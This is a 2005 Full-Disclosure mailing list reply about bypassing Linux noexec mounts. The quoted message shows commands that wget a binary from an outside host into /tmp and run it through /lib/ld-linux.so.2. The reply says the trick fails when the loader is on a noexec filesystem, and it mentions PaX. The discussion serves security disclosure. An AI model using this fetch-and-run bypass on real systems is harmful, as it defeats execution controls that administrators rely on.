[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] linux bugs (survival stories)?
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] linux bugs (survival stories)?
- From: Joachim Schipper <j.schipper@xxxxxxxxxx>
- Date: Wed, 13 Apr 2005 00:44:12 +0200
> 'hello world' can bypass noexec
> just remove the executable flags from the program headers
> the compiled binary don't even need to have executable permissions
>
> #include <stdio.h>
> int main(int argc, char *argv[])
> {
> printf("Hello world!\n");
> return 0;
> }
>
>
> % sudo mount -o remount,noexec /tmp
> % wget http://pornadmin.net/~tongson/linux/helloworld.bin -O
> /tmp/helloworld.bin
> % /lib/ld-linux.so.2 /tmp/helloworld.bin
> Hello world!
This does not seem to work when ld-linux.so.2 is on a filesystem mounted
noexec, though [1]. Wouldn't this make it akin to calling /bin/bash
hello_world.sh?
PaX can stop you from mmap()ing a file and then executing the code
inside, IIRC, but since this breaks X11 it's uncommon to enable the
option.
Joachim
[1] ./ld-linux.so.2 fails when called without arguments. Checked on
linux-2.6.11.7-grsec. ld-linux.so.2 was moved to a different disk before
the check was made, with and without chroot and strace. Where strace was
used, it showed that exec() failed.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/